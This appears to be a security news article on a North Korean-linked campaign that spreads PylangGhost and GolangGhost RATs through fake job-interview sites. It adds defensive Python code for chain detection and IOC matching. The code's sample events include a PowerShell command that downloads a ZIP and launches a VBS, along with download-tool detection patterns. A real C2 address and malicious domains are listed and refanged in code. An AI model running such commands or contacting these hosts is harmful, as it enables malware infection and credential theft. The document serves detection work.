Chollima Hackers Target Windows and MacOS with New GolangGhost RAT Malware
A North Korean-affiliated threat actor called Famous Chollima (also known as Wagemole) has launched a sophisticated remote access trojan (RAT) campaign against Windows and macOS devices, a concerning development discovered by Cisco Talos in May 2025.
This group, suspected to comprise multiple coordinated entities, has introduced a Python-based variant dubbed “PylangGhost” alongside the previously documented Golang-based “GolangGhost” RAT.
While Windows users encounter the Python variant, macOS systems are targeted with the Golang version, leaving Linux users unaffected in this latest wave of attacks.
North Korean-Aligned Threat Actor
The primary victims appear to be professionals with expertise in cryptocurrency and blockchain technologies, a clear indication of the attackers’ focus on financial gain through stolen credentials and sensitive data.
The Famous Chollima group employs a cunning two-pronged strategy to exploit their targets, as detailed in Cisco Talos’ findings.
Their primary method involves creating fake job interview platforms impersonating reputable companies like Coinbase, Robinhood, Uniswap, and Parallel Studios.

Unsuspecting job seekers, primarily software engineers, marketing professionals, and designers, are lured with personalized invite codes to skill-testing websites built on the React framework.
After entering personal details and answering tailored questions, users are prompted to record a video interview.
This step deceives them into executing a malicious command presented as a driver installation required for camera access; the command is run through PowerShell or Bash, depending on the operating system.

Cryptocurrency and Blockchain Experts in the Crosshairs
For Windows, the command downloads a ZIP file containing PylangGhost modules and a Visual Basic Script to unzip and launch the trojan through a renamed Python interpreter file, “nvidia.py”.
On macOS, a similar infection chain delivers the GolangGhost variant. This “ClickFix” tactic, part of broader campaigns like Contagious Interview, has been active since mid-2024, exploiting human trust in professional opportunities.
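The Windows infection chain just described has three observable steps on an endpoint: a shell command that fetches a ZIP, a Visual Basic Script launched to unpack it, and a Python script run by an interpreter that no longer carries a python image name. The following is an added example (not Cisco Talos code) that links those steps through the process tree of constructed process-creation events; the host names, PIDs, command lines and the `placeholder.invalid` download host are assumptions made for the demonstration, and the macOS chain is not modelled.

```python
"""Heuristic for the ClickFix chain: shell download of a ZIP -> VBS launcher
-> Python script executed by a renamed interpreter. Added example; the
events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    pid: int
    parent_pid: int
    image: str      # executable file name as recorded by the sensor
    cmdline: str


SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "bash", "sh", "zsh"}
PYTHON_IMAGES = {"python.exe", "python3.exe", "pythonw.exe", "python", "python3"}
DOWNLOAD_ZIP_RE = re.compile(r"(Invoke-WebRequest|iwr|curl|wget)\b.*\.zip", re.I)
VBS_LAUNCH_RE = re.compile(r"\b(wscript|cscript)(\.exe)?\b.*\.vbs", re.I)
PY_SCRIPT_RE = re.compile(r"\S+\.py\b", re.I)


def stage(ev):
    """Classify one event as a chain stage, or None if it matches nothing."""
    if ev.image.lower() in SHELL_IMAGES and DOWNLOAD_ZIP_RE.search(ev.cmdline):
        return "download_zip"
    if VBS_LAUNCH_RE.search(ev.cmdline):
        return "vbs_launcher"
    # A .py on the command line of a process that is not named like a Python
    # interpreter: noisy on its own (editors open .py files too), so it only
    # counts when an ancestor also matches a stage.
    if PY_SCRIPT_RE.search(ev.cmdline) and ev.image.lower() not in PYTHON_IMAGES:
        return "renamed_python"
    return None


def find_chains(events):
    """Walk up from every renamed-interpreter event and return
    [(host, [stages in execution order])] where at least two stages link
    via parent PID on the same host."""
    by_pid = {(e.host, e.pid): e for e in events}
    hits = []
    for e in events:
        if stage(e) != "renamed_python":
            continue
        chain = ["renamed_python"]
        cur = e
        while (cur.host, cur.parent_pid) in by_pid:
            cur = by_pid[(cur.host, cur.parent_pid)]
            s = stage(cur)
            if s:
                chain.append(s)
        if len(chain) >= 2:
            hits.append((e.host, list(reversed(chain))))
    return hits


# Constructed events: one host showing the full chain, one benign host.
SAMPLE_EVENTS = [
    ProcEvent("ws01", 100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 200, 100, "powershell.exe",
              'powershell.exe -c "Invoke-WebRequest http://placeholder.invalid/cam.zip '
              '-OutFile $env:TEMP\\cam.zip; wscript $env:TEMP\\run.vbs"'),
    ProcEvent("ws01", 210, 200, "wscript.exe",
              "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\run.vbs"),
    ProcEvent("ws01", 220, 210, "nvidia.exe", "nvidia.exe nvidia.py"),
    ProcEvent("ws02", 300, 1, "python.exe", "python.exe build.py"),  # benign
]

if __name__ == "__main__":
    for host, chain in find_chains(SAMPLE_EVENTS):
        print(host, " -> ".join(chain))
```

The renamed-interpreter stage alone would fire on any editor or build tool that takes a `.py` argument; requiring a linked ancestor that downloaded a ZIP or launched a VBS is what keeps the alert specific to the chain the article describes.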
Technically, PylangGhost mirrors GolangGhost in functionality, featuring six structured Python modules for tasks like establishing persistence via registry entries, generating unique system GUIDs, and communicating with command-and-control (C2) servers using RC4-encrypted HTTP packets.
The RAT enables remote system control, file manipulation, and credential theft from over 80 browser extensions, including cryptocurrency wallets like MetaMask and password managers like 1Password.
Open-source intelligence suggests the impact is currently limited, with a small number of affected users predominantly in India, and no Cisco customers impacted per telemetry data.
Despite the different programming languages, the near-identical module structures and naming conventions between PylangGhost and GolangGhost suggest a close-knit development team behind both variants.
Cisco Talos has provided robust detection and mitigation tools, including Secure Endpoint, Secure Email, and Secure Firewall, alongside ClamAV signatures and Snort rules to combat this threat.
Below is a curated list of Indicators of Compromise (IOCs) for reference, including file hashes, C2 server addresses, and deceptive domains used in the campaign.
Organizations, especially in the cryptocurrency sector, are urged to remain vigilant against such socially engineered attacks.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| SHA256 (Sample) | a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a (auto.py) |
| C2 Servers | hxxp[://]31[.]57[.]243[.]29:8080 |
| Download Host | api[.]quickcamfix[.]online |
| Fake Job Site | krakenhire[.]com |
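The indicators above are published defanged (`hxxp`, `[.]`, `[://]`), so they have to be refanged before they can be matched against live DNS, proxy or EDR logs. The following added example (not Cisco Talos tooling) does that and scans a handful of constructed log lines for the hash, the C2 host and the two domains from the table; the log lines, client addresses and file paths are assumptions made for the demonstration.

```python
"""Refang the campaign's defanged IOCs and match them against log lines.
Added example; the log lines are constructed, not real telemetry."""
import re
from urllib.parse import urlparse

# Indicators exactly as listed in the table above, still defanged.
DEFANGED_IOCS = {
    "sha256": ["a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a"],
    "c2": ["hxxp[://]31[.]57[.]243[.]29:8080"],
    "domain": ["api[.]quickcamfix[.]online", "krakenhire[.]com"],
}


def refang(indicator):
    """Turn defanged notation (hxxp, [.], [://]) back into the live form."""
    s = indicator.replace("[.]", ".").replace("[://]", "://")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)


def build_matchers(defanged):
    """Compile one regex per indicator: hashes match literally (case-
    insensitive), network indicators match on the host name bounded by
    non-hostname characters so subdomains hit but look-alikes do not."""
    matchers = []
    for ioc_type, items in defanged.items():
        for item in items:
            live = refang(item)
            if ioc_type == "sha256":
                pat = re.compile(re.escape(live), re.I)
            else:
                host = urlparse(live if "://" in live else "//" + live).hostname
                pat = re.compile(r"(?<![A-Za-z0-9-])" + re.escape(host)
                                 + r"(?![A-Za-z0-9-])", re.I)
            matchers.append((ioc_type, item, pat))
    return matchers


def scan(lines, matchers):
    """Return [(line_no, ioc_type, defanged_indicator)] for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ioc_type, item, pat in matchers:
            if pat.search(line):
                hits.append((n, ioc_type, item))
    return hits


# Constructed log lines: DNS, proxy and EDR file events, plus two benign ones.
SAMPLE_LOGS = [
    "2025-05-20T10:01:02Z dns query client=10.0.0.5 qname=api.quickcamfix.online type=A",
    "2025-05-20T10:01:09Z proxy CONNECT 31.57.243.29:8080 user=jdoe bytes=4096",
    "2025-05-20T10:02:00Z dns query client=10.0.0.5 qname=updates.example.com type=A",
    "2025-05-20T10:03:15Z edr file_create path=C:\\Users\\jdoe\\AppData\\Local\\Temp\\auto.py "
    "sha256=A206EA9B415A0EAFD731B4EEC762A5B5E8DF8D9007E93046029D83316989790A",
    "2025-05-20T10:04:00Z dns query client=10.0.0.9 qname=notkrakenhire.com type=A",
]

if __name__ == "__main__":
    for n, ioc_type, item in scan(SAMPLE_LOGS, build_matchers(DEFANGED_IOCS)):
        print(f"line {n}: {ioc_type} match on {item}")
```

Hashes are compared case-insensitively because sensors differ in how they render them, and the look-alike `notkrakenhire.com` in the last line is deliberately not a hit: the boundary assertions only allow a match where the indicator is the whole host or a parent of it.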